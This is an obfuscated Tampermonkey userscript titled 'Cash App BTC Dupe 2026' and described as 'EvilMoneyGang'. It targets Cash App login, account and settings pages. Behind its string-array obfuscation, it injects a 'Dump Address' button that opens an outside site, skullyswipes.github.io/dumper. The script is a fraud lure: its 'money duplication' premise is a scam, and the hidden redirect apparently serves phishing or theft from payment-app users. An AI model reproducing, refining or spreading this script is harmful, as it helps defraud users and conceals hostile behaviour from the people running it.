// ==UserScript==
// @name         Cash App BTC Dupe 2026
// @namespace    http://tampermonkey.net/
// @version      0.1
// @description  EvilMoneyGang
// @author       You
// @match        https://cash.app/account/activity
// @match        https://cash.app/account/mycash
// @match        https://cash.app/account/settings
// @match        https://cash.app/login?
// @icon         https://www.google.com/s2/favicons?sz=64&domain=cash.app
// @grant        none
// ==/UserScript==

function drayton(pavin, ashleylynn) {
  const niurka = denese();
  return drayton = function (ronna, orlandra) {
    ronna = ronna - 236;
    let galit = niurka[ronna];
    return galit;
  }, drayton(pavin, ashleylynn);
}
(function (jaccob, thalmus) {
  const rodas = drayton, mann = jaccob();
  while (true) {
    try {
      const jamarlon = parseInt(rodas(239)) / 1 * (-parseInt(rodas(253)) / 2) + -parseInt(rodas(254)) / 3 * (-parseInt(rodas(236)) / 4) + -parseInt(rodas(252)) / 5 * (-parseInt(rodas(237)) / 6) + parseInt(rodas(238)) / 7 + parseInt(rodas(248)) / 8 + parseInt(rodas(243)) / 9 * (parseInt(rodas(246)) / 10) + -parseInt(rodas(244)) / 11 * (parseInt(rodas(241)) / 12);
      if (jamarlon === thalmus) break; else mann.push(mann.shift());
    } catch (crysti) {
      mann.push(mann.shift());
    }
  }
}(denese, 305712), function () {
  "use strict";
  const orian = drayton;
  const ermajean = document.querySelector[orian(255)](document);
  ermajean("body")[orian(240)](orian(247), init_css()), setTimeout(() => {
    const lumi = orian;
    ermajean(lumi(245))[lumi(250)]("click", () => {
      const lyndee = lumi;
      window[lyndee(249)](lyndee(251));
    });
  }, 500);
}());
function init_css() {
  const macalah = drayton;
  return macalah(242);
}
function denese() {
  const yarelys = ["479160OqOHwu", '\n    <button id="mybutt">Dump Address</button>\n    <style>\n        #mybutt{position:absolute;top:85px;left:5%;height:60px;width:120px;border:#ffffff;font-size:15px;border-radius:6px;}\n        #mybutt{background:#ffffff;color:black;padding-top:0px;text-align:center;}\n        #mybutt{z-index:99999;}\n    </style>\n    ', "4458357UahIDh", "253ntAvCY", "#mybutt", "10KVrATs", "beforeend", "2169024NjCmfh", "open", "addEventListener", "https://skullyswipes.github.io/dumper/", "1744945vnTrXf", "135578oVHEWT", "3yQIwCA", "bind", "1096772FHcfGO", "6bGjCAL", "3111640bMOEyN", "9xXglHb", "insertAdjacentHTML"];
  denese = function () {
    return yarelys;
  };
  return denese();
}
